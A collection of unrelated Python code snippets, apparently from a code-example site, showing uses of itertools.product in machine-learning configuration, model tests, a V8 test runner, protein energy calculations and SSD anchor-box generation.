        "Get a list of all pairwise combinations from lists pair1 and pair2."
        product_list = [(x, y) for x, y in product(pair1, pair2)]
        return product_list
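
    # Usage sketch: for pair1 = ('a', 'b') and pair2 = ('x', 'y') this returns
    # [('a', 'x'), ('a', 'y'), ('b', 'x'), ('b', 'y')].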
예제 #48
0
import itertools
import json
import subprocess

learning_rate = [0.01, 0.1, 1]
batch_size = [128, 512, 2048, 4096]
n_epochs = [10, 50, 100]
optimizer = ['gradient_descent', 'adadelta', 'adam']

config_list = list(itertools.product(learning_rate,
                                     batch_size,
                                     n_epochs,
                                     optimizer))

no_of_configs = len(config_list)

list_of_dicts = []

for config in config_list:
    config_dict = {
        "learning_rate": config[0],
        "batch_size": config[1],
        "n_epochs": config[2],
        "optimizer": {
            "gradient_descent": config[3] == "gradient_descent",
            "adadelta": config[3] == "adadelta",
            "adam": config[3] == "adam"
        }
    }

    list_of_dicts.append(config_dict)
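
# 3 * 4 * 3 * 3 = 108 configurations in total. A minimal follow-up sketch for
# persisting them with the json module imported above (the output file name
# 'configs.json' is hypothetical):
with open('configs.json', 'w') as f:
    json.dump(list_of_dicts, f, indent=2)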
예제 #49
0
    # game.set_render_particles(False)
    # game.set_render_effects_sprites(False)  # Smoke and blood
    # game.set_render_messages(False)  # In-game messages
    # game.set_render_corpses(False)
    # game.set_render_screen_flashes(True)  # Effect upon taking damage or picking up items

    # Makes the screen bigger to see more details.
    game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)
    game.set_window_visible(True)
    game.set_mode(vzd.Mode.SPECTATOR)
    game.init()

    # Creates all possible actions depending on how many buttons there are.
    actions_num = game.get_available_buttons_size()
    actions = []
    for perm in it.product([False, True], repeat=actions_num):
        actions.append(list(perm))
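    # With N available buttons, product([False, True], repeat=N) enumerates
    # all 2**N possible button-press combinations.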

    episodes = 1
    sleep_time = 0.028

    for i in range(episodes):
        print("Episode #" + str(i + 1))

        # Not needed for the first episode but the loop is nicer.
        game.new_episode()
        while not game.is_episode_finished():

            # Gets the state and possibly does something with it
            state = game.get_state()
예제 #50
0
    def consolidate(self):
        """Each residue has multiple protonated and deprotonated states. Here
           we consolidate those into two states for each residue, PROT and DEPROT.
           We take minimums of energies between states in each class. For example,
           assume we have two amino acids, A and B, where A has protonated states 1, 2, 3
           and deprotonated state 4, and B has protonated states 1, 2, and deprotonated
           state 3. Then
           E(A_PROT, B_PROT) = min{E(A1,B1), E(A1,B2), E(A2,B1), E(A2,B2), E(A3,B1), E(A3,B2)},
           E(A_PROT, B_DEPROT) = min{E(A1,B3), E(A2,B3), E(A3,B3)},
           E(A_DEPROT, B_PROT) = min{E(A4,B1), E(A4,B2)}, and
           E(A_DEPROT, B_DEPROT) = E(A4,B3).
           We do not deal with HIS here; it is kept in its 3 states for now.

           After this is finished all unused interaction energies will be removed from
           self.interaction_energies."""

        handled_interaction_pairs = set()

        #See https://docs.python.org/2/library/itertools.html#itertools.combinations
        for v, w in combinations(iter(self.residue_variables.items()), 2):
            v_key, v_residue = v
            w_key, w_residue = w
            v_name = v_key[0]
            w_name = w_key[0]

            #Skip HIS for now
            if v_name == 'HIS' or w_name == 'HIS':
                continue

            v_protonated, v_unprotonated = v_residue.get_prot_and_deprot_instances()
            v_prot_consolidated = v_residue.instances["PROTONATED"]
            v_deprot_consolidated = v_residue.instances["DEPROTONATED"]

            w_protonated, w_unprotonated = w_residue.get_prot_and_deprot_instances()
            w_prot_consolidated = w_residue.instances["PROTONATED"]
            w_deprot_consolidated = w_residue.instances["DEPROTONATED"]

            #For every pairing of v and w (protonated and unprotonated) find the
            # minimum interaction energy and update the interaction map accordingly.
            v_stuff = ((v_protonated, v_prot_consolidated),
                       (v_unprotonated, v_deprot_consolidated))
            w_stuff = ((w_protonated, w_prot_consolidated),
                       (w_unprotonated, w_deprot_consolidated))

            for v_product, w_product in product(v_stuff, w_stuff):
                v_instances, v_consolidated = v_product
                w_instances, w_consolidated = w_product

                energies = []
                #Find all of the pairs
                for v_instance, w_instance in product(v_instances,
                                                      w_instances):
                    energy = self.interaction_energies[v_instance, w_instance]
                    energies.append(energy)
                    #Mark for deletion.
                    handled_interaction_pairs.add((v_instance, w_instance))

                min_energy = min(energies)

                self.add_interaction_energy_pair(v_consolidated,
                                                 w_consolidated, min_energy)

        #Now handle HIS.
        #See https://docs.python.org/2/library/itertools.html#itertools.permutations
        for v, w in permutations(iter(self.residue_variables.items()), 2):
            his_key, his_residue = v
            other_key, other_residue = w
            his_name = his_key[0]
            other_name = other_key[0]

            #We only care about HIS on this pass
            if his_name != 'HIS':
                continue
            #HIS - HIS is already correct for what this pass does.
            if other_name == 'HIS':
                continue

            other_protonated, other_unprotonated = other_residue.get_prot_and_deprot_instances()
            other_prot_consolidated = other_residue.instances["PROTONATED"]
            other_deprot_consolidated = other_residue.instances["DEPROTONATED"]

            his_protonated, his_unprotonated = his_residue.get_prot_and_deprot_instances()
            his_stuff = his_protonated + his_unprotonated
            other_stuff = ((other_protonated, other_prot_consolidated),
                           (other_unprotonated, other_deprot_consolidated))

            #For every pairing of a HIS instance and another non HIS residue find the
            # minimum interaction energy and update the interaction map accordingly.
            #See https://docs.python.org/2/library/itertools.html#itertools.product
            for his_instance, other_product in product(his_stuff, other_stuff):
                other_instances, other_consolidated = other_product

                energies = []

                for other_instance in other_instances:
                    energy = self.interaction_energies[his_instance,
                                                       other_instance]
                    energies.append(energy)
                    handled_interaction_pairs.add(
                        (his_instance, other_instance))

                min_energy = min(energies)

                self.add_interaction_energy_pair(his_instance,
                                                 other_consolidated,
                                                 min_energy)

        #Clean out unused interaction energies
        self.drop_interaction_pairs(handled_interaction_pairs)

        for key, residue in self.residue_variables.items():
            name = key[0]
            if name == 'HIS':
                continue

            residue.instances = OrderedDict(
                (k, v) for k, v in residue.instances.items()
                if "PROTONATED" in k)
예제 #51
0
class TestL2Pool:
    @pytest.mark.parametrize(
        "use_cpu_only, backend, num_dims",
        itertools.product([True, False], backends, [1, 2]),
    )
    def test_builder_to_backend_smoke(self, use_cpu_only, backend, num_dims):
        kernel_sizes = [1, 2, 3]
        strides = [2, 1, 3]

        if num_dims == 1:
            x_val = np.array([[[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]]],
                             dtype=np.float32)
            expected_output_types = [(1, 1, 4, types.fp32),
                                     (1, 1, 3, types.fp32)]
            expected_outputs = [
                np.array([[[1.0, 3.0, 5.0, 7.0]]], dtype=np.float32),
                np.array([[[2.236068, 7.071068, 9.219544]]], dtype=np.float32),
            ]
        elif num_dims == 2:
            x_val = np.array(
                [[[[-10.0, -6.0], [-7.0, 9.0]], [[-3.0, 0.0], [11.0, 7.0]]]],
                dtype=np.float32,
            )
            expected_output_types = [(1, 2, 1, 1, types.fp32),
                                     (1, 2, 2, 1, types.fp32)]
            expected_outputs = [
                np.array([[[[11.66190338]], [[3.0]]]], dtype=np.float32),
                np.array(
                    [[[[16.309507], [11.401754]], [[13.379088], [13.038404]]]],
                    dtype=np.float32,
                ),
            ]
        else:  # num_dims == 3
            pass  # Enum PoolingType3D has no value defined for name L2

        input_values = {"x": x_val}
        input_placeholders = {"x": mb.placeholder(shape=x_val.shape)}

        def build(x):
            return [
                mb.l2_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[:num_dims],
                    strides=strides[:num_dims],
                    pad_type="valid",
                ),
                mb.l2_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[-num_dims:],
                    strides=strides[-num_dims:],
                    pad_type="same",
                ),
            ]

        run_compare_builder(
            build,
            input_placeholders,
            input_values,
            expected_output_types,
            expected_outputs,
            use_cpu_only=use_cpu_only,
            frontend_only=False,
            backend=backend,
        )
예제 #52
0
	def train(self, X, Y, normfac, radius, prevw):
		# The weight vector w is kept as pairs (alpha_i * y_i, x_i); send only the required number of rows
		solvers.options['show_progress'] = False
		
		# Reduce maxiters and tolerance to reasonable levels
		solvers.options['maxiters'] = 2000
		solvers.options['abstol'] = 1e-2
		solvers.options['feastol'] = 1e-2

		row, col = X.shape
		
		P = matrix(0.0, (row+1,row+1))
		
		# Calculating the Kernel Matrix
		# Kernel matrix will now include multiple kernel matrices
		for i in range(row):
			for j in range(row):
				P[i,j] = Y[i] * self.kernel(X[i],X[j]) * Y[j]       # It's a PSD matrix, so it's okay!
		
		# Summing over the kernel values between current set of points and prevw
		for i in range(row):
			P[i,row] = normfac * Y[i] * sum( prevw[k][0] * self.kernel(prevw[k][1], X[i]) for k in range(len(prevw)) )
			P[row,i] = P[i,row]

		# summing over the kernels value of the entire prevw matrix
		P[row, row] = pow(normfac,2) * sum( prevw[k][0] * self.kernel(prevw[k][1], prevw[r][1]) * prevw[r][0] for k,r in itertools.product(range(len(prevw)), range(len(prevw))) )

		# A point in the solution space for objective
		x_0 = matrix(0.5, (row+1, 1))
		
		normarr = matrix([normfac]*row + [normfac*(1-pow(radius,2)/2)]).T
		
		def F(x = None, z = None):
			
			if x is None:
			    return (0, x_0)                                         # Alphas start from 0.5; the first value is zero as there are zero non-linear objectives
			
			term = matrix(sqrt(x.T * P * x))
			
			f = matrix(term - normfac * sum(x[0:row]) - x[row] * normfac * (1-pow(radius,2)/2))                         # return the objective function
			
			# first derivative
			Df = (x.T * P)/term - normarr 						        # since for each alpha, normfac will be subtracted, norm arr is an array
			
			#print "Rank of Df"
			#print linalg.matrix_rank(Df)
			#print Df.size
			#print "Rank of f"
			#print linalg.matrix_rank(f)
			
			if z is None:
			    return f, Df
			
			term2 = matrix((P*x) * (P*x).T)
			H = z[0] * (P/term - term2/pow(term,3))                     # Second derivative of the objective function, is a symmetric matrix, so no need for spDiag ?
			
			#print "Rank of hessian"
			#print linalg.matrix_rank((P/term - term2/pow(term,3)))
			#print "Size of hessian"
			#print H.size
			
			return f, Df, H

		# for linear inequalities
		G = matrix(0.0, (row*2 + 1, row + 1))									# there are two linear constraints for Alpha, one for Beta
		h = matrix(0.0, (row*2 +1, 1))
		for i in range(row):
			G[i,i] = -1.0       										# -Alpha <= 0
			G[row+i, i] = 1.0                                           #  Alpha <= 1
			h[row+i] = 1.0
		G[row*2, row] = -1.0                                            # -Beta <= 0

		#print "Rank of G"
		#print linalg.matrix_rank(G)
		#print "Rank of hessian"
		#print linalg.matrix_rank(h)
		

		# solve and return w
		sol = solvers.cp(F, G, h)
		
		#print sol
		
		alpha = sol['x'][0:row]
		beta = sol['x'][row]
		
		row_prev = len(prevw)
		templist = []
		
		for i in range(row):
			templist.append([alpha[i] * Y[i], X[i]])
		
		# Add Beta * Tau_k to the previous support vectors and store in current support vectors
		for i in range(row_prev):
			templist.append([prevw[i][0] * beta * normfac, prevw[i][1]])
		
		self.support = templist
예제 #53
0
    def _load_stream_without_unbatching(self, stream):
        key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
        val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
        for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
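            # Each zipped element pairs one key batch with its corresponding value batch.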
            # for correctness with repeated cartesian/zip this must be returned as one batch
            yield product(key_batch, val_batch)
예제 #54
0
    def classifier(self,
                   x,
                   scales,
                   filters,
                   repeat,
                   training,
                   getter=None,
                   dropout=0,
                   **kwargs):
        del kwargs
        bn_args = dict(training=training, momentum=0.999)

        def conv_args(k, f):
            return dict(padding='same',
                        use_bias=False,
                        kernel_initializer=tf.random_normal_initializer(
                            stddev=tf.rsqrt(0.5 * k * k * f)))

        def residual(x0, filters, stride=1):
            def branch():
                x = tf.nn.relu(x0)
                x = tf.layers.conv2d(x,
                                     filters,
                                     3,
                                     strides=stride,
                                     **conv_args(3, filters))
                x = tf.nn.relu(tf.layers.batch_normalization(x, **bn_args))
                x = tf.layers.conv2d(x, filters, 3, **conv_args(3, filters))
                x = tf.layers.batch_normalization(x, **bn_args)
                return x

            x = layers.shakeshake(branch(), branch(), training)

            if stride == 2:
                x1 = tf.layers.conv2d(tf.nn.relu(x0[:, ::2, ::2]),
                                      filters >> 1, 1,
                                      **conv_args(1, filters >> 1))
                x2 = tf.layers.conv2d(tf.nn.relu(x0[:, 1::2, 1::2]),
                                      filters >> 1, 1,
                                      **conv_args(1, filters >> 1))
                x0 = tf.concat([x1, x2], axis=3)
                x0 = tf.layers.batch_normalization(x0, **bn_args)
            elif x0.get_shape()[3] != filters:
                x0 = tf.layers.conv2d(x0, filters, 1, **conv_args(1, filters))
                x0 = tf.layers.batch_normalization(x0, **bn_args)

            return x0 + x

        with tf.variable_scope('classify',
                               reuse=tf.AUTO_REUSE,
                               custom_getter=getter):
            y = tf.layers.conv2d((x - self.dataset.mean) / self.dataset.std,
                                 16, 3, **conv_args(3, 16))
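            # product() flattens two nested loops: for each scale, iterate over the repeated residual blocks.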
            for scale, i in itertools.product(range(scales), range(repeat)):
                with tf.variable_scope('layer%d.%d' % (scale + 1, i)):
                    if i == 0:
                        y = residual(y,
                                     filters << scale,
                                     stride=2 if scale else 1)
                    else:
                        y = residual(y, filters << scale)

            y = embeds = tf.reduce_mean(y, [1, 2])
            if dropout and training:
                y = tf.nn.dropout(y, 1 - dropout)
            logits = tf.layers.dense(
                y,
                self.nclass,
                kernel_initializer=tf.glorot_normal_initializer())
        return EasyDict(logits=logits, embeds=embeds)
예제 #55
0
    # Currently, maximization is not implemented.
    with pytest.raises(ValueError):
        study = optuna.create_study(direction='maximize')
        study.optimize(func, n_trials=10)
        assert study.direction == optuna.structs.StudyDirection.MAXIMIZE
        check_study(study)

    with pytest.raises(ValueError):
        optuna.create_study(direction='test')


@pytest.mark.parametrize(
    'n_trials, n_jobs, storage_mode',
    itertools.product(
        (0, 1, 2, 50),  # n_trials
        (1, 2, 10, -1),  # n_jobs
        STORAGE_MODES,  # storage_mode
    ))
def test_optimize_parallel(n_trials, n_jobs, storage_mode):
    # type: (int, int, str) -> None

    f = Func()

    with StorageSupplier(storage_mode) as storage:
        study = optuna.create_study(storage=storage)
        study.optimize(f, n_trials=n_trials, n_jobs=n_jobs)
        assert f.n_calls == len(study.trials) == n_trials
        check_study(study)


@pytest.mark.parametrize(
예제 #56
0
class TestAvgPool:
    @pytest.mark.parametrize(
        "use_cpu_only, backend, num_dims",
        itertools.product([True, False], backends, [1, 2, 3]),
    )
    def test_builder_to_backend_smoke(self, use_cpu_only, backend, num_dims):
        kernel_sizes = [1, 2, 3]
        strides = [2, 1, 3]

        if num_dims == 1:
            x_val = np.array([[[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]]],
                             dtype=np.float32)
            expected_output_types = [(1, 1, 4, types.fp32),
                                     (1, 1, 3, types.fp32)]
            expected_outputs = [
                np.array([[[1.0, 3.0, 5.0, 7.0]]], dtype=np.float32),
                np.array([[[1.5, 4.0, 6.5]]], dtype=np.float32),
            ]
        elif num_dims == 2:
            x_val = np.array(
                [[
                    [[-10.80291205, -6.42076184], [-7.07910997, 9.1913279]],
                    [[-3.18181497, 0.9132147], [11.9785544, 7.92449539]],
                ]],
                dtype=np.float32,
            )
            expected_output_types = [(1, 2, 1, 1, types.fp32),
                                     (1, 2, 2, 1, types.fp32)]
            expected_outputs = [
                np.array([[[[-8.611837]], [[-1.1343001]]]], dtype=np.float32),
                np.array(
                    [[[[-3.7778642], [1.056109]], [[4.4086123], [9.951525]]]],
                    dtype=np.float32,
                ),
            ]
        else:  # num_dims == 3
            x_val = np.array(
                [
                    [[
                        [[-1, -5, -1], [-3, -3, 8], [2, 6, 2]],
                        [[-4, 7, -4], [4, 6, 7], [4, 4, 8]],
                        [[5, -3, 5], [0, -5, 8], [1, 7, 2]],
                    ]],
                    [[
                        [[7, -3, -5], [5, 4, 7], [-2, -4, -3]],
                        [[-4, 3, -1], [6, -4, 4], [3, 6, 2]],
                        [[-1, 4, -4], [-2, -1, -2], [3, 2, 8]],
                    ]],
                ],
                dtype=np.float32,
            )
            expected_output_types = [
                (2, 1, 2, 2, 1, types.fp32),
                (2, 1, 2, 3, 1, types.fp32),
            ]
            expected_outputs = [
                np.array(
                    [
                        [[[[-0.8333334], [2.0]], [[1.6666667], [2.1666667]]]],
                        [[[[2.5], [1.1666667]], [[-1.0], [1.3333334]]]],
                    ],
                    dtype=np.float32,
                ),
                np.array(
                    [
                        [[
                            [[-0.8333334], [2.0], [3.3333335]],
                            [[1.6666667], [2.1666667], [3.3333335]],
                        ]],
                        [[
                            [[2.5], [1.1666667], [-3.0]],
                            [[-1.0], [1.3333334], [4.3333335]],
                        ]],
                    ],
                    dtype=np.float32,
                ),
            ]

        input_values = {"x": x_val}
        input_placeholders = {"x": mb.placeholder(shape=x_val.shape)}

        def build(x):
            return [
                mb.avg_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[:num_dims],
                    strides=strides[:num_dims],
                    pad_type="valid",
                ),
                mb.avg_pool(
                    x=x,
                    kernel_sizes=kernel_sizes[-num_dims:],
                    strides=strides[-num_dims:],
                    pad_type="same",
                    exclude_padding_from_average=True,
                ),
            ]

        run_compare_builder(
            build,
            input_placeholders,
            input_values,
            expected_output_types,
            expected_outputs,
            use_cpu_only=use_cpu_only,
            frontend_only=False,
            backend=backend,
        )
예제 #57
0
print()

# chaining 1
gen5 = itertools.chain('ABCDE', range(1, 11, 2))

print(list(gen5))

# chaining 2

gen6 = itertools.chain(enumerate('ABCDE'))

print(list(gen6))

# single iterable
gen7 = itertools.product('ABCDE')

print(list(gen7))
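# With a single iterable and no repeat argument, product() yields 1-tuples:
# ('A',), ('B',), ...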

# cartesian product (number of cases)
gen8 = itertools.product('ABCDE', repeat=2)

print(list(gen8))

# grouping
gen9 = itertools.groupby('AAABBCCCCDDEEE')

# print(list(gen9))

for key, group in gen9:
    print(key, ' : ', list(group))
예제 #58
0
def num_unique(x, ycol, tol):
    def _err(x1, x2):
        return np.abs(x1 - x2) / (2 * np.abs(x1 + x2))
    vals = [list(x[ycol].values), list(x[ycol].values)]
    arr = np.array([_err(*p) for p in product(*vals) if p[0] > p[1]])
    return len(arr[arr > tol])  # number of different values
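
# Since both entries of vals are the same column, product(*vals) visits every
# ordered pair; the p[0] > p[1] filter keeps one ordering of each pair of
# distinct values and drops self-pairs.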
예제 #59
0
def ProcessOptions(options):
  global VARIANTS

  # First try to auto-detect configurations based on the build if GN was
  # used. This can't be overridden by cmd-line arguments.
  options.auto_detect = False
  if options.gn:
    gn_out_dir = os.path.join(BASE_DIR, DEFAULT_OUT_GN)
    latest_timestamp = -1
    latest_config = None
    for gn_config in os.listdir(gn_out_dir):
      gn_config_dir = os.path.join(gn_out_dir, gn_config)
      if not isdir(gn_config_dir):
        continue
      if os.path.getmtime(gn_config_dir) > latest_timestamp:
        latest_timestamp = os.path.getmtime(gn_config_dir)
        latest_config = gn_config
    if latest_config:
      print(">>> Latest GN build found is %s" % latest_config)
      options.outdir = os.path.join(DEFAULT_OUT_GN, latest_config)

  if options.buildbot:
    build_config_path = os.path.join(
        BASE_DIR, options.outdir, options.mode, "v8_build_config.json")
  else:
    build_config_path = os.path.join(
        BASE_DIR, options.outdir, "v8_build_config.json")

  # Auto-detect test configurations based on the build (GN only).
  if os.path.exists(build_config_path):
    try:
      with open(build_config_path) as f:
        build_config = json.load(f)
    except Exception:
      print ("%s exists but contains invalid json. Is your build up-to-date?" %
             build_config_path)
      return False
    options.auto_detect = True

    # In auto-detect mode the outdir is always where we found the build config.
    # This ensures that we'll also take the build products from there.
    options.outdir = os.path.dirname(build_config_path)
    options.arch_and_mode = None
    if options.mode:
      # In auto-detect mode we don't use the mode for more path-magic.
      # Therefore transform the buildbot mode here to fit to the GN build
      # config.
      options.mode = BuildbotToV8Mode(options.mode)

    # In V8 land, GN's x86 is called ia32.
    if build_config["v8_target_cpu"] == "x86":
      build_config["v8_target_cpu"] = "ia32"

    # Update options based on the build config. Sanity check that we're not
    # trying to use inconsistent options.
    for param, value in (
        ('arch', build_config["v8_target_cpu"]),
        ('asan', build_config["is_asan"]),
        ('dcheck_always_on', build_config["dcheck_always_on"]),
        ('gcov_coverage', build_config["is_gcov_coverage"]),
        ('mode', 'debug' if build_config["is_debug"] else 'release'),
        ('msan', build_config["is_msan"]),
        ('no_i18n', not build_config["v8_enable_i18n_support"]),
        ('no_snap', not build_config["v8_use_snapshot"]),
        ('tsan', build_config["is_tsan"]),
        ('ubsan_vptr', build_config["is_ubsan_vptr"])):
      cmd_line_value = getattr(options, param)
      if cmd_line_value not in [None, True, False] and cmd_line_value != value:
        # TODO(machenbach): This is for string options only. Requires options
        # to not have default values. We should make this more modular and
        # implement it in our own version of the option parser.
        print "Attempted to set %s to %s, while build is %s." % (
            param, cmd_line_value, value)
        return False
      if cmd_line_value == True and value == False:
        print "Attempted to turn on %s, but it's not available." % (
            param)
        return False
      if cmd_line_value != value:
        print ">>> Auto-detected %s=%s" % (param, value)
      setattr(options, param, value)

  else:
    # Non-GN build without auto-detect. Set default values for missing
    # parameters.
    if not options.mode:
      options.mode = "release,debug"
    if not options.arch:
      options.arch = "ia32,x64,arm"

  # Architecture and mode related stuff.
  if options.arch_and_mode:
    options.arch_and_mode = [arch_and_mode.split(".")
        for arch_and_mode in options.arch_and_mode.split(",")]
    options.arch = ",".join([tokens[0] for tokens in options.arch_and_mode])
    options.mode = ",".join([tokens[1] for tokens in options.arch_and_mode])
  options.mode = options.mode.split(",")
  for mode in options.mode:
    if BuildbotToV8Mode(mode) not in MODES:
      print("Unknown mode %s" % mode)
      return False
  if options.arch in ["auto", "native"]:
    options.arch = ARCH_GUESS
  options.arch = options.arch.split(",")
  for arch in options.arch:
    if arch not in SUPPORTED_ARCHS:
      print("Unknown architecture %s" % arch)
      return False

  # Store the final configuration in arch_and_mode list. Don't overwrite
  # predefined arch_and_mode since it is more expressive than arch and mode.
  if not options.arch_and_mode:
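    # itertools.product lazily yields every (arch, mode) pair, e.g.
    # ("ia32", "release"), ("ia32", "debug"), ...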
    options.arch_and_mode = itertools.product(options.arch, options.mode)

  # Special processing of other options, sorted alphabetically.

  if options.buildbot:
    options.network = False
  if options.command_prefix and options.network:
    print("Specifying --command-prefix disables network distribution, "
          "running tests locally.")
    options.network = False
  options.command_prefix = shlex.split(options.command_prefix)
  options.extra_flags = sum(map(shlex.split, options.extra_flags), [])

  if options.gc_stress:
    options.extra_flags += GC_STRESS_FLAGS

  if options.asan:
    options.extra_flags.append("--invoke-weak-callbacks")
    options.extra_flags.append("--omit-quit")

  if options.novfp3:
    options.extra_flags.append("--noenable-vfp3")

  if options.exhaustive_variants:
    # This is used on many bots. It includes a larger set of default variants.
    # Other options for manipulating variants still apply afterwards.
    VARIANTS = EXHAUSTIVE_VARIANTS

  # TODO(machenbach): Figure out how to test a bigger subset of variants on
  # msan.
  if options.msan:
    VARIANTS = ["default"]

  if options.j == 0:
    options.j = multiprocessing.cpu_count()

  if options.random_seed_stress_count <= 1 and options.random_seed == 0:
    options.random_seed = RandomSeed()

  def excl(*args):
    """Returns true if zero or one of multiple arguments are true."""
    return sum(args) <= 1

  if not excl(options.no_variants, bool(options.variants)):
    print("Use only one of --no-variants or --variants.")
    return False
  if options.quickcheck:
    VARIANTS = ["default", "stress"]
    options.slow_tests = "skip"
    options.pass_fail_tests = "skip"
  if options.no_variants:
    VARIANTS = ["default"]
  if options.variants:
    VARIANTS = options.variants.split(",")

    # Resolve variant aliases.
    VARIANTS = [v for alias in VARIANTS
                for v in VARIANT_ALIASES.get(alias, [alias])]

    if not set(VARIANTS).issubset(ALL_VARIANTS):
      print "All variants must be in %s" % str(ALL_VARIANTS)
      return False
  if options.predictable:
    VARIANTS = ["default"]
    options.extra_flags.append("--predictable")
    options.extra_flags.append("--verify_predictable")
    options.extra_flags.append("--no-inline-new")

  # Dedupe.
  VARIANTS = list(set(VARIANTS))

  if not options.shell_dir:
    if options.shell:
      print "Warning: --shell is deprecated, use --shell-dir instead."
      options.shell_dir = os.path.dirname(options.shell)
  if options.valgrind:
    run_valgrind = os.path.join("tools", "run-valgrind.py")
    # This is OK for distributed running, so we don't need to disable network.
    options.command_prefix = (["python", "-u", run_valgrind] +
                              options.command_prefix)
  def CheckTestMode(name, option):
    if option not in ["run", "skip", "dontcare"]:
      print("Unknown %s mode %s" % (name, option))
      return False
    return True
  if not CheckTestMode("slow test", options.slow_tests):
    return False
  if not CheckTestMode("pass|fail test", options.pass_fail_tests):
    return False
  if options.no_i18n:
    TEST_MAP["bot_default"].remove("intl")
    TEST_MAP["default"].remove("intl")
  return True
예제 #60
0
    def __init__(self,
                 fig_size,
                 feat_size,
                 steps,
                 scales,
                 aspect_ratios,
                 scale_xy=0.1,
                 scale_wh=0.2):
        self.fig_size = fig_size  # input image size fed to the network, e.g. 300
        # [38, 19, 10, 5, 3, 1]
        self.feat_size = feat_size  # feature map size of each prediction layer

        self.scale_xy_ = scale_xy
        self.scale_wh_ = scale_wh

        # According to https://github.com/weiliu89/caffe
        # Calculation method slightly different from paper
        # [8, 16, 32, 64, 100, 300]
        self.steps = steps  # stride of one cell on each feature layer, measured on the original image

        # [21, 45, 99, 153, 207, 261, 315]
        self.scales = scales  # scale of the default boxes predicted on each feature layer

        fk = fig_size / np.array(steps)  # compute fk for each feature layer
        # [[2], [2, 3], [2, 3], [2, 3], [2], [2]]
        self.aspect_ratios = aspect_ratios  # aspect ratios of the default boxes on each prediction layer

        self.default_boxes = []
        # size of feature and number of feature
        # iterate over every feature layer and compute its default boxes
        for idx, sfeat in enumerate(self.feat_size):
            sk1 = scales[idx] / fig_size  # convert scale to a relative value in [0, 1]
            sk2 = scales[idx + 1] / fig_size  # convert scale to a relative value in [0, 1]
            sk3 = sqrt(sk1 * sk2)
            # first add the two 1:1 aspect-ratio default box sizes
            all_sizes = [(sk1, sk1), (sk3, sk3)]

            # then append the widths/heights for the remaining aspect ratios to all_sizes
            for alpha in aspect_ratios[idx]:
                w, h = sk1 * sqrt(alpha), sk1 / sqrt(alpha)
                all_sizes.append((w, h))
                all_sizes.append((h, w))

            # compute all default boxes this feature layer maps to on the original image
            for w, h in all_sizes:
                for i, j in itertools.product(
                        range(sfeat), repeat=2):  # i -> row (y), j -> column (x)
                    # center coordinates of each default box (relative, in 0-1)
                    cx, cy = (j + 0.5) / fk[idx], (i + 0.5) / fk[idx]
                    self.default_boxes.append((cx, cy, w, h))

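        # For the SSD300 settings noted above (feat_size [38, 19, 10, 5, 3, 1]
        # with 4/6/6/6/4/4 boxes per cell), this produces 8732 default boxes.
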
        # convert default_boxes to a tensor
        self.dboxes = torch.tensor(self.default_boxes,
                                   dtype=torch.float32)  # the explicit dtype is required here, otherwise an error is raised
        self.dboxes.clamp_(min=0, max=1)  # clamp all coordinates (x, y, w, h) to 0-1

        # For IoU calculation
        # ltrb is left top coordinate and right bottom coordinate
        # convert (x, y, w, h) to (xmin, ymin, xmax, ymax) to simplify the later
        # IoU computation (when matching positive/negative samples)
        self.dboxes_ltrb = self.dboxes.clone()
        self.dboxes_ltrb[:, 0] = self.dboxes[:, 0] - 0.5 * self.dboxes[:, 2]  # xmin
        self.dboxes_ltrb[:, 1] = self.dboxes[:, 1] - 0.5 * self.dboxes[:, 3]  # ymin
        self.dboxes_ltrb[:, 2] = self.dboxes[:, 0] + 0.5 * self.dboxes[:, 2]  # xmax
        self.dboxes_ltrb[:, 3] = self.dboxes[:, 1] + 0.5 * self.dboxes[:, 3]  # ymax